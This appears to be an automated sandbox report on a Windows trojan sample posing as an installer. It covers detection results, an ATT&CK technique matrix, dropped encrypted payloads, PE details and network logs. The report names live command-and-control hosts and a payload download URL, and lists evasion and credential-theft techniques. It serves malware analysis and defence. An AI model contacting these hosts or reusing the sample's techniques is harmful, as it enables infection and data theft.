          Source: C:\Users\user\Desktop\998_popxinv_Installer.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
          Source: C:\Users\user\Desktop\998_popxinv_Installer.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
          Source: C:\Users\user\Desktop\998_popxinv_Installer.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
          Source: C:\Users\user\Desktop\998_popxinv_Installer.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
          Source: C:\Users\user\Desktop\998_popxinv_Installer.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
          Source: C:\Users\user\Desktop\998_popxinv_Installer.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
          Source: C:\Users\user\Desktop\998_popxinv_Installer.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
          Source: C:\Users\user\Desktop\998_popxinv_Installer.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
          Source: C:\Users\user\Desktop\998_popxinv_Installer.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
          Source: C:\Users\user\Desktop\998_popxinv_Installer.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct

          Stealing of Sensitive Information

          barindex
          Source: Yara matchFile source: 0.2.998_popxinv_Installer.exe.5f90000.1.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0.2.998_popxinv_Installer.exe.5f90000.1.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 00000000.00000002.3872605515.0000000005F90000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: Process Memory Space: 998_popxinv_Installer.exe PID: 1564, type: MEMORYSTR

          Remote Access Functionality

          barindex
          Source: Yara matchFile source: 0.2.998_popxinv_Installer.exe.5f90000.1.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0.2.998_popxinv_Installer.exe.5f90000.1.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 00000000.00000002.3872605515.0000000005F90000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: Process Memory Space: 998_popxinv_Installer.exe PID: 1564, type: MEMORYSTR
          ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
          Gather Victim Identity InformationAcquire InfrastructureValid Accounts11
          Windows Management Instrumentation
          1
          DLL Side-Loading
          1
          DLL Side-Loading
          1
          Masquerading
          OS Credential Dumping1
          System Time Discovery
          Remote Services11
          Archive Collected Data
          1
          Encrypted Channel
          Exfiltration Over Other Network MediumAbuse Accessibility Features
          CredentialsDomainsDefault Accounts2
          Native API
          Boot or Logon Initialization ScriptsBoot or Logon Initialization Scripts1
          Disable or Modify Tools
          LSASS Memory141
          Security Software Discovery
          Remote Desktop ProtocolData from Removable Media11
          Non-Standard Port
          Exfiltration Over BluetoothNetwork Denial of Service
          Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)131
          Virtualization/Sandbox Evasion
          Security Account Manager131
          Virtualization/Sandbox Evasion
          SMB/Windows Admin SharesData from Network Shared Drive2
          Ingress Tool Transfer
          Automated ExfiltrationData Encrypted for Impact
          Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook11
          Deobfuscate/Decode Files or Information
          NTDS1
          Application Window Discovery
          Distributed Component Object ModelInput Capture2
          Non-Application Layer Protocol
          Traffic DuplicationData Destruction
          Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script2
          Obfuscated Files or Information
          LSA Secrets34
          System Information Discovery
          SSHKeylogging12
          Application Layer Protocol
          Scheduled TransferData Encrypted for Impact
          Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts2
          Software Packing
          Cached Domain CredentialsWi-Fi DiscoveryVNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
          DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items1
          DLL Side-Loading
          DCSyncRemote System DiscoveryWindows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
          Hide Legend

          Legend:

          • Process
          • Signature
          • Created File
          • DNS/IP Info
          • Is Dropped
          • Is Windows Process
          • Number of created Registry Values
          • Number of created Files
          • Visual Basic
          • Delphi
          • Java
          • .Net C# or VB.NET
          • C, C++ or other language
          • Is malicious
          • Internet

          This section contains all screenshots as thumbnails, including those not shown in the slideshow.


          windows-stand
          SourceDetectionScannerLabelLink
          998_popxinv_Installer.exe21%ReversingLabs
          998_popxinv_Installer.exe100%Joe Sandbox ML
          No Antivirus matches
          No Antivirus matches
          No Antivirus matches
          SourceDetectionScannerLabelLink
          http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name0%URL Reputationsafe
          http://guanlix.cn:881/998.ccpS0%Avira URL Cloudsafe
          http://guanlix.cn:881/998.ccp0%Avira URL Cloudsafe
          134.122.174.1690%Avira URL Cloudsafe
          NameIPActiveMaliciousAntivirus DetectionReputation
          guanlix.cn
          91.208.240.157
          truefalse
            unknown
            NameMaliciousAntivirus DetectionReputation
            http://guanlix.cn:881/998.ccpfalse
            • Avira URL Cloud: safe
            unknown
            134.122.174.169true
            • Avira URL Cloud: safe
            unknown
            NameSourceMaliciousAntivirus DetectionReputation
            http://guanlix.cn:881/998.ccpS998_popxinv_Installer.exe, 00000000.00000002.3869480227.00000000013DF000.00000004.00000020.00020000.00000000.sdmpfalse
            • Avira URL Cloud: safe
            unknown
            http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name998_popxinv_Installer.exe, 00000000.00000002.3871104262.0000000003D51000.00000004.00000800.00020000.00000000.sdmpfalse
            • URL Reputation: safe
            unknown
            • No. of IPs < 25%
            • 25% < No. of IPs < 50%
            • 50% < No. of IPs < 75%
            • 75% < No. of IPs
            IPDomainCountryFlagASNASN NameMalicious
            91.208.240.157
            guanlix.cnunknown
            139659LUCID-AS-APLUCIDACLOUDLIMITEDHKfalse
            134.122.174.169
            unknownUnited States
            64050BCPL-SGBGPNETGlobalASNSGtrue
            Joe Sandbox version:40.0.0 Tourmaline
            Analysis ID:1466320
            Start date and time:2024-07-02 19:27:32 +02:00
            Joe Sandbox product:CloudBasic
            Overall analysis duration:0h 6m 43s
            Hypervisor based Inspection enabled:false
            Report type:full
            Cookbook file name:default.jbs
            Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
            Number of analysed new started processes analysed:7
            Number of new started drivers analysed:0
            Number of existing processes analysed:0
            Number of existing drivers analysed:0
            Number of injected processes analysed:0
            Technologies:
            • HCA enabled
            • EGA enabled
            • AMSI enabled
            Analysis Mode:default
            Analysis stop reason:Timeout
            Sample name:998_popxinv_Installer.exe
            Detection:MAL
            Classification:mal100.troj.evad.winEXE@1/2@1/2
            EGA Information:
            • Successful, ratio: 100%
            HCA Information:
            • Successful, ratio: 100%
            • Number of executed functions: 24
            • Number of non-executed functions: 33
            Cookbook Comments:
            • Found application associated with file extension: .exe
            • Override analysis time to 240000 for current running targets taking high CPU consumption
            • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe, conhost.exe
            • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
            • Not all processes where analyzed, report is missing behavior information
            • Report size getting too big, too many NtOpenKeyEx calls found.
            • Report size getting too big, too many NtQueryValueKey calls found.
            • VT rate limit hit for: 998_popxinv_Installer.exe
            TimeTypeDescription
            13:28:33API Interceptor8505197x Sleep call for process: 998_popxinv_Installer.exe modified
            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
            91.208.240.157139_p.exeGet hashmaliciousUnknownBrowse
            • guanlix.cn:881/139.ccp
            156_p.exeGet hashmaliciousUnknownBrowse
            • guanlix.cn:881/156.ccp
            103__Installer.exeGet hashmaliciousXWormBrowse
            • guanlix.cn:881/103.ccp
            33__Installer.exeGet hashmaliciousXWormBrowse
            • guanlix.cn:881/330.ccp
            31__Installer.exeGet hashmaliciousXWormBrowse
            • guanlix.cn:881/31.ccp
            103-o_Installer.exeGet hashmaliciousXWormBrowse
            • guanlix.cn:881/103.ccp
            31-o_Installer.exeGet hashmaliciousXWormBrowse
            • guanlix.cn:881/31.ccp
            33-o_Installer.exeGet hashmaliciousXWormBrowse
            • guanlix.cn:881/33.ccp
            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
            guanlix.cn139_p.exeGet hashmaliciousUnknownBrowse
            • 91.208.240.157
            156_p.exeGet hashmaliciousUnknownBrowse
            • 91.208.240.157
            103__Installer.exeGet hashmaliciousXWormBrowse
            • 91.208.240.157
            33__Installer.exeGet hashmaliciousXWormBrowse
            • 91.208.240.157
            31__Installer.exeGet hashmaliciousXWormBrowse
            • 91.208.240.157
            103-o_Installer.exeGet hashmaliciousXWormBrowse
            • 91.208.240.157
            31-o_Installer.exeGet hashmaliciousXWormBrowse
            • 91.208.240.157
            33-o_Installer.exeGet hashmaliciousXWormBrowse
            • 91.208.240.157
            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
            BCPL-SGBGPNETGlobalASNSGh8N9qpyRAPaiitu.exeGet hashmaliciousFormBookBrowse
            • 14.128.41.167
            sora.mpsl.elfGet hashmaliciousMiraiBrowse
            • 118.107.53.143
            Request for Quotation - e092876.exeGet hashmaliciousFormBookBrowse
            • 118.107.56.38
            Dtjgu2gHw0.elfGet hashmaliciousMiraiBrowse
            • 137.220.211.71
            cEEsFMSdw8.elfGet hashmaliciousMiraiBrowse
            • 118.107.53.144
            PTT requested quotation.exeGet hashmaliciousFormBookBrowse
            • 118.107.56.40
            GOoY5QBqvC.elfGet hashmaliciousMirai, MoobotBrowse
            • 118.107.53.127
            https://whastappg.top/Get hashmaliciousUnknownBrowse
            • 216.224.126.59
            666.exeGet hashmaliciousUnknownBrowse
            • 143.92.49.135
            666.exeGet hashmaliciousUnknownBrowse
            • 143.92.49.135
            LUCID-AS-APLUCIDACLOUDLIMITEDHK139_p.exeGet hashmaliciousUnknownBrowse
            • 91.208.240.157
            156_p.exeGet hashmaliciousUnknownBrowse
            • 91.208.240.157
            103__Installer.exeGet hashmaliciousXWormBrowse
            • 91.208.240.157
            33__Installer.exeGet hashmaliciousXWormBrowse
            • 91.208.240.157
            31__Installer.exeGet hashmaliciousXWormBrowse
            • 91.208.240.157
            103-o_Installer.exeGet hashmaliciousXWormBrowse
            • 91.208.240.157
            31-o_Installer.exeGet hashmaliciousXWormBrowse
            • 91.208.240.157
            33-o_Installer.exeGet hashmaliciousXWormBrowse
            • 91.208.240.157
            https://telegram-wv.icu/Get hashmaliciousUnknownBrowse
            • 103.143.81.212
            #U6ce1#U6ce1#U7801#U5ba2#U6237#U7aef.exeGet hashmaliciousUnknownBrowse
            • 45.136.13.176
            No context
            No context
            Process:C:\Users\user\Desktop\998_popxinv_Installer.exe
            File Type:data
            Category:dropped
            Size (bytes):71938
            Entropy (8bit):7.603614008435648
            Encrypted:false
            SSDEEP:1536:ps4vqW9lScGjh+6BkfHP5REB+I2/dcx+WN1rvTSFsbWXM6eKXBwLsy1ETqfvu+PE:K4vqXf1Nkfv5a+I2/CwWj2OUMRKXBwLC
            MD5:66F0DEE667D7F05D72AA6D3C827B5483
            SHA1:38140E7D7F0157DCAFEEB5DBDD79A820BADDA3AD
            SHA-256:CED79FF0D64E20C02C5D7FDF0918013BA9687361FF1651317B3E49FCC30FF4FE
            SHA-512:B18E2A48B565328BDFC5D02F8F6B96DE0A1DF5253A877F5F9411CAAC9AD1AD9C5142917816556C0D0E30DE2BBA62AABF100B332CCBDA2DFBA53590396B85AE95
            Malicious:false
            Yara Hits:
            • Rule: Windows_Trojan_Donutloader_f40e3759, Description: unknown, Source: C:\Users\Public\Downloads\ind.jpg, Author: unknown
            Reputation:low
            Preview:.......G7E..`C..wo...u..:....{..,...$...."....C...>b....1J....j.~25.p.....X..Bh.RZB0..Gau.NSh...4r.....[...l}h.qKH..... a.u...a..T/L2b...Q....S.Y7...\v..I.(s..n..H/.l.La..4t.O...P#m.s...VX...iZ....f#7.9...q..1@v=M............|......k.s.1.[...5..V......)..5..%...e\..|..$..^.P.....t|(..)....K.Wl.<.B*'nFn.B..........................................................................................................................................................................................................................................................|.....qg....9XV..J..6....C.}F....W...z..~.....9=,...4.-g.'<udT.F....0 ...T...?F/:....+.v.l..$.tN.?......3.....~=0...H.m_--......}O.f.....}.....r.|....,......0.DP....].~....U..'.9...9...=...a.p9.L...Q.>/.1.:.&...&....Xj...;.B......t.L...t.BV?Q.....=..^.l.l..7..%~Y.Ww5.V...J..N7.......1=...`..A..a]..%....M=..9.......}!......{..Y....1.kr...-...c.....mao.a#....l.w.`B..[@....U....YH:...^[K5k.m.....x.t..R..0p..@D...N
            Process:C:\Users\user\Desktop\998_popxinv_Installer.exe
            File Type:data
            Category:dropped
            Size (bytes):71938
            Entropy (8bit):7.603614008435648
            Encrypted:false
            SSDEEP:1536:ps4vqW9lScGjh+6BkfHP5REB+I2/dcx+WN1rvTSFsbWXM6eKXBwLsy1ETqfvu+PE:K4vqXf1Nkfv5a+I2/CwWj2OUMRKXBwLC
            MD5:66F0DEE667D7F05D72AA6D3C827B5483
            SHA1:38140E7D7F0157DCAFEEB5DBDD79A820BADDA3AD
            SHA-256:CED79FF0D64E20C02C5D7FDF0918013BA9687361FF1651317B3E49FCC30FF4FE
            SHA-512:B18E2A48B565328BDFC5D02F8F6B96DE0A1DF5253A877F5F9411CAAC9AD1AD9C5142917816556C0D0E30DE2BBA62AABF100B332CCBDA2DFBA53590396B85AE95
            Malicious:false
            Yara Hits:
            • Rule: Windows_Trojan_Donutloader_f40e3759, Description: unknown, Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\D81IGXZV\998[1].ccp, Author: unknown
            Reputation:low
            Preview:.......G7E..`C..wo...u..:....{..,...$...."....C...>b....1J....j.~25.p.....X..Bh.RZB0..Gau.NSh...4r.....[...l}h.qKH..... a.u...a..T/L2b...Q....S.Y7...\v..I.(s..n..H/.l.La..4t.O...P#m.s...VX...iZ....f#7.9...q..1@v=M............|......k.s.1.[...5..V......)..5..%...e\..|..$..^.P.....t|(..)....K.Wl.<.B*'nFn.B..........................................................................................................................................................................................................................................................|.....qg....9XV..J..6....C.}F....W...z..~.....9=,...4.-g.'<udT.F....0 ...T...?F/:....+.v.l..$.tN.?......3.....~=0...H.m_--......}O.f.....}.....r.|....,......0.DP....].~....U..'.9...9...=...a.p9.L...Q.>/.1.:.&...&....Xj...;.B......t.L...t.BV?Q.....=..^.l.l..7..%~Y.Ww5.V...J..N7.......1=...`..A..a]..%....M=..9.......}!......{..Y....1.kr...-...c.....mao.a#....l.w.`B..[@....U....YH:...^[K5k.m.....x.t..R..0p..@D...N
            File type:PE32 executable (GUI) Intel 80386, for MS Windows
            Entropy (8bit):5.938758047679234
            TrID:
            • Win32 Executable (generic) a (10002005/4) 99.96%
            • Generic Win/DOS Executable (2004/3) 0.02%
            • DOS Executable Generic (2002/1) 0.02%
            • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
            File name:998_popxinv_Installer.exe
            File size:249'344 bytes
            MD5:a8dc1e962f313cd278b0e648a6674d91
            SHA1:dd55bccfc5c30aa9a608b6c6fd10dd392cec82ad
            SHA256:1bc92d0988234ee9f52b96fd7ecd8d0b4159d69480581e5f46b2f29ab0f77684
            SHA512:5a6eb3da99273607208131cf599b7a11c5d6130e90a1e21e4b9b0718bdb9c90d392c19ecb99e8fc07ad15c8ad8458efd9a5481031131f729364040a7a442f85f
            SSDEEP:3072:Ue0P41iYUwihfpRBCaYXrD5sxTQp+m7QNae4ZQeAnuTCt2xbzmyoaq6rcYsc8kOt:784UwwRY7aTQBQN/njZ2xGp
            TLSH:32346B92F6C0D4B6D81711B5D83ADEB2126BBD798974010B36A5372F5EB33831936E0B
            File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......A.q>...m...m...mj..m...mj..m...m...m...m...m_..mj..m1..mj..m...mj..m...mRich...m........PE..L....Z.f.................v...T.....
            Icon Hash:20246c0c56e20926
            Entrypoint:0x405b41
            Entrypoint Section:.text
            Digitally signed:false
            Imagebase:0x400000
            Subsystem:windows gui
            Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
            DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
            Time Stamp:0x66835A95 [Tue Jul 2 01:40:37 2024 UTC]
            TLS Callbacks:
            CLR (.Net) Version:
            OS Version Major:5
            OS Version Minor:1
            File Version Major:5
            File Version Minor:1
            Subsystem Version Major:5
            Subsystem Version Minor:1
            Import Hash:0b47c746b58dc722dcec07246158fda2
            Instruction
            call 00007F434508AB85h
            jmp 00007F43450835EEh
            mov edi, edi
            push ebp
            mov ebp, esp
            mov eax, dword ptr [ebp+08h]
            test eax, eax
            je 00007F4345083774h
            sub eax, 08h
            cmp dword ptr [eax], 0000DDDDh
            jne 00007F4345083769h
            push eax
            call 00007F434508204Fh
            pop ecx
            pop ebp
            ret
            mov edi, edi
            push ebp
            mov ebp, esp
            mov eax, dword ptr [ebp+08h]
            push esi
            mov esi, ecx
            mov byte ptr [esi+0Ch], 00000000h
            test eax, eax
            jne 00007F43450837C5h
            call 00007F434508737Eh
            mov dword ptr [esi+08h], eax
            mov ecx, dword ptr [eax+6Ch]
            mov dword ptr [esi], ecx
            mov ecx, dword ptr [eax+68h]
            mov dword ptr [esi+04h], ecx
            mov ecx, dword ptr [esi]
            cmp ecx, dword ptr [004201F8h]
            je 00007F4345083774h
            mov ecx, dword ptr [0041FFB0h]
            test dword ptr [eax+70h], ecx
            jne 00007F4345083769h
            call 00007F434508B55Fh
            mov dword ptr [esi], eax
            mov eax, dword ptr [esi+04h]
            cmp eax, dword ptr [0041FEB8h]
            je 00007F4345083778h
            mov eax, dword ptr [esi+08h]
            mov ecx, dword ptr [0041FFB0h]
            test dword ptr [eax+70h], ecx
            jne 00007F434508376Ah
            call 00007F434508ADBEh
            mov dword ptr [esi+04h], eax
            mov eax, dword ptr [esi+08h]
            test byte ptr [eax+70h], 00000002h
            jne 00007F4345083776h
            or dword ptr [eax+70h], 02h
            mov byte ptr [esi+0Ch], 00000001h
            jmp 00007F434508376Ch
            mov ecx, dword ptr [eax]
            mov dword ptr [esi], ecx
            mov eax, dword ptr [eax+04h]
            mov dword ptr [esi+04h], eax
            mov eax, esi
            pop esi
            pop ebp
            retn 0004h
            mov edi, edi
            push ebp
            mov ebp, esp
            sub esp, 10h
            mov eax, dword ptr [0041F920h]
            xor eax, ebp
            mov dword ptr [ebp-04h], eax
            mov edx, dword ptr [ebp+18h]
            push ebx
            Programming Language:
            • [ASM] VS2010 build 30319
            • [ C ] VS2010 build 30319
            • [IMP] VS2008 SP1 build 30729
            • [C++] VS2010 build 30319
            • [RES] VS2010 build 30319
            • [LNK] VS2010 build 30319
            NameVirtual AddressVirtual Size Is in Section
            IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
            IMAGE_DIRECTORY_ENTRY_IMPORT0x1d96c0x3c.rdata
            IMAGE_DIRECTORY_ENTRY_RESOURCE0x230000x1c748.rsrc
            IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
            IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
            IMAGE_DIRECTORY_ENTRY_BASERELOC0x400000x138c.reloc
            IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
            IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
            IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
            IMAGE_DIRECTORY_ENTRY_TLS0x00x0
            IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x1c3780x40.rdata
            IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
            IMAGE_DIRECTORY_ENTRY_IAT0x190000x150.rdata
            IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
            IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
            IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
            NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
            .text0x10000x175480x1760011f66f6816777e46b10e535a4423e055False0.5846632687165776data6.6444729085072565IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
            .rdata0x190000x50f00x520097091f345fb00fe6f4b21106ff8a4e31False0.3602801067073171data4.931773399760593IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
            .data0x1f0000x37c40x1a0045f752e15a14fca1b3ff2706b42091afFalse0.3167067307692308data3.8749828218454043IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
            .rsrc0x230000x1c7480x1c80013c7e8b4f8049f0b57e98c87b62e9647False0.2745768229166667data4.800930470827677IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
            .reloc0x400000x1e2e0x200074110a466e5dcc00e19c2f5fa7cce65eFalse0.485595703125data4.814924868127027IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
            NameRVASizeTypeLanguageCountryZLIB Complexity
            RT_ICON0x233a00x668Device independent bitmap graphic, 48 x 96 x 4, image size 1152ChineseChina0.2554878048780488
            RT_ICON0x23a080x2e8Device independent bitmap graphic, 32 x 64 x 4, image size 512ChineseChina0.3602150537634409
            RT_ICON0x23cf00x1e8Device independent bitmap graphic, 24 x 48 x 4, image size 288ChineseChina0.39344262295081966
            RT_ICON0x23ed80x128Device independent bitmap graphic, 16 x 32 x 4, image size 128ChineseChina0.4358108108108108
            RT_ICON0x240000xea8Device independent bitmap graphic, 48 x 96 x 8, image size 2304, 256 important colorsChineseChina0.4986673773987207
            RT_ICON0x24ea80x8a8Device independent bitmap graphic, 32 x 64 x 8, image size 1024, 256 important colorsChineseChina0.5888989169675091
            RT_ICON0x257500x6c8Device independent bitmap graphic, 24 x 48 x 8, image size 576, 256 important colorsChineseChina0.548963133640553
            RT_ICON0x25e180x568Device independent bitmap graphic, 16 x 32 x 8, image size 256, 256 important colorsChineseChina0.40534682080924855
            RT_ICON0x263800x10828Device independent bitmap graphic, 128 x 256 x 32, image size 67584ChineseChina0.18236129184904767
            RT_ICON0x36ba80x4228Device independent bitmap graphic, 64 x 128 x 32, image size 16896ChineseChina0.3425838450637695
            RT_ICON0x3add00x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 9600ChineseChina0.3924273858921162
            RT_ICON0x3d3780x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 4224ChineseChina0.49953095684803
            RT_ICON0x3e4200x988Device independent bitmap graphic, 24 x 48 x 32, image size 2400ChineseChina0.580327868852459
            RT_ICON0x3eda80x468Device independent bitmap graphic, 16 x 32 x 32, image size 1088ChineseChina0.6906028368794326
            RT_GROUP_ICON0x3f2100xcadataChineseChina0.6089108910891089
            RT_VERSION0x3f2dc0x304dataChineseChina0.43134715025906734
            RT_MANIFEST0x3f5e00x165ASCII text, with CRLF line terminatorsEnglishUnited States0.5434173669467787
            DLLImport
            KERNEL32.dllCloseHandle, ReadFile, VirtualAlloc, GetFileSize, CreateFileA, Sleep, GetTickCount64, VirtualFree, SetEndOfFile, CreateFileW, SetStdHandle, WriteConsoleW, LoadLibraryW, IsValidLocale, InterlockedIncrement, InterlockedDecrement, InitializeCriticalSection, DeleteCriticalSection, EnterCriticalSection, LeaveCriticalSection, EncodePointer, DecodePointer, GetSystemTimeAsFileTime, GetLastError, HeapFree, RaiseException, RtlUnwind, GetCommandLineA, HeapSetInformation, GetStartupInfoW, WideCharToMultiByte, LCMapStringW, MultiByteToWideChar, GetCPInfo, HeapAlloc, IsProcessorFeaturePresent, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, GetModuleHandleW, SetLastError, GetCurrentThreadId, GetProcAddress, UnhandledExceptionFilter, SetUnhandledExceptionFilter, IsDebuggerPresent, TerminateProcess, GetCurrentProcess, HeapCreate, SetHandleCount, GetStdHandle, InitializeCriticalSectionAndSpinCount, GetFileType, ExitProcess, WriteFile, GetConsoleCP, GetConsoleMode, FlushFileBuffers, SetFilePointer, GetModuleFileNameW, GetModuleFileNameA, FreeEnvironmentStringsW, GetEnvironmentStringsW, QueryPerformanceCounter, GetTickCount, GetCurrentProcessId, GetACP, GetOEMCP, IsValidCodePage, GetStringTypeW, GetLocaleInfoW, HeapReAlloc, HeapSize, GetUserDefaultLCID, GetLocaleInfoA, EnumSystemLocalesA, GetProcessHeap
            WININET.dllInternetCloseHandle, InternetReadFile, InternetOpenUrlA, InternetOpenA
            Language of compilation systemCountry where language is spokenMap
            ChineseChina
            EnglishUnited States
            TimestampProtocolSIDMessageSource PortDest PortSource IPDest IP
            07/02/24-19:31:18.778371TCP2853193ETPRO TROJAN Win32/XWorm V3 CnC Command - PING Outbound497497000192.168.2.8134.122.174.169
            07/02/24-19:29:42.015000TCP2855924ETPRO TROJAN Win32/XWorm V3 CnC Command - PING Outbound497297000192.168.2.8134.122.174.169
            TimestampSource PortDest PortSource IPDest IP
            Jul 2, 2024 19:28:28.897821903 CEST49704881192.168.2.891.208.240.157
            Jul 2, 2024 19:28:28.903358936 CEST8814970491.208.240.157192.168.2.8
            Jul 2, 2024 19:28:28.903513908 CEST49704881192.168.2.891.208.240.157
            Jul 2, 2024 19:28:28.903692007 CEST49704881192.168.2.891.208.240.157
            Jul 2, 2024 19:28:28.909557104 CEST8814970491.208.240.157192.168.2.8
            Jul 2, 2024 19:28:29.858350039 CEST8814970491.208.240.157192.168.2.8
            Jul 2, 2024 19:28:29.858380079 CEST8814970491.208.240.157192.168.2.8
            Jul 2, 2024 19:28:29.858392000 CEST8814970491.208.240.157192.168.2.8
            Jul 2, 2024 19:28:29.858403921 CEST8814970491.208.240.157192.168.2.8
            Jul 2, 2024 19:28:29.858414888 CEST8814970491.208.240.157192.168.2.8
            Jul 2, 2024 19:28:29.858428001 CEST8814970491.208.240.157192.168.2.8
            Jul 2, 2024 19:28:29.858462095 CEST49704881192.168.2.891.208.240.157
            Jul 2, 2024 19:28:29.858515978 CEST49704881192.168.2.891.208.240.157
            Jul 2, 2024 19:28:29.858515978 CEST8814970491.208.240.157192.168.2.8
            Jul 2, 2024 19:28:29.858529091 CEST8814970491.208.240.157192.168.2.8
            Jul 2, 2024 19:28:29.858540058 CEST8814970491.208.240.157192.168.2.8
            Jul 2, 2024 19:28:29.858551979 CEST8814970491.208.240.157192.168.2.8
            Jul 2, 2024 19:28:29.858560085 CEST49704881192.168.2.891.208.240.157
            Jul 2, 2024 19:28:29.858584881 CEST49704881192.168.2.891.208.240.157
            Jul 2, 2024 19:28:29.863317966 CEST8814970491.208.240.157192.168.2.8
            Jul 2, 2024 19:28:29.863374949 CEST8814970491.208.240.157192.168.2.8
            Jul 2, 2024 19:28:29.863387108 CEST8814970491.208.240.157192.168.2.8
            Jul 2, 2024 19:28:29.863409996 CEST49704881192.168.2.891.208.240.157
            Jul 2, 2024 19:28:29.863446951 CEST49704881192.168.2.891.208.240.157
            Jul 2, 2024 19:28:30.095968008 CEST8814970491.208.240.157192.168.2.8
            Jul 2, 2024 19:28:30.095989943 CEST8814970491.208.240.157192.168.2.8
            Jul 2, 2024 19:28:30.096009016 CEST8814970491.208.240.157192.168.2.8
            Jul 2, 2024 19:28:30.096023083 CEST8814970491.208.240.157192.168.2.8
            Jul 2, 2024 19:28:30.096035004 CEST8814970491.208.240.157192.168.2.8
            Jul 2, 2024 19:28:30.096048117 CEST8814970491.208.240.157192.168.2.8
            Jul 2, 2024 19:28:30.096066952 CEST8814970491.208.240.157192.168.2.8
            Jul 2, 2024 19:28:30.096102953 CEST49704881192.168.2.891.208.240.157
            Jul 2, 2024 19:28:30.096159935 CEST49704881192.168.2.891.208.240.157
            Jul 2, 2024 19:28:30.096589088 CEST8814970491.208.240.157192.168.2.8
            Jul 2, 2024 19:28:30.096633911 CEST8814970491.208.240.157192.168.2.8
            Jul 2, 2024 19:28:30.096646070 CEST8814970491.208.240.157192.168.2.8
            Jul 2, 2024 19:28:30.096648932 CEST49704881192.168.2.891.208.240.157
            Jul 2, 2024 19:28:30.096690893 CEST49704881192.168.2.891.208.240.157
            Jul 2, 2024 19:28:30.096981049 CEST8814970491.208.240.157192.168.2.8
            Jul 2, 2024 19:28:30.097033024 CEST49704881192.168.2.891.208.240.157
            Jul 2, 2024 19:28:30.097039938 CEST8814970491.208.240.157192.168.2.8
            Jul 2, 2024 19:28:30.097053051 CEST8814970491.208.240.157192.168.2.8
            Jul 2, 2024 19:28:30.097078085 CEST8814970491.208.240.157192.168.2.8
            Jul 2, 2024 19:28:30.097083092 CEST49704881192.168.2.891.208.240.157
            Jul 2, 2024 19:28:30.097110033 CEST49704881192.168.2.891.208.240.157
            Jul 2, 2024 19:28:30.097121954 CEST49704881192.168.2.891.208.240.157
            Jul 2, 2024 19:28:30.097568989 CEST8814970491.208.240.157192.168.2.8
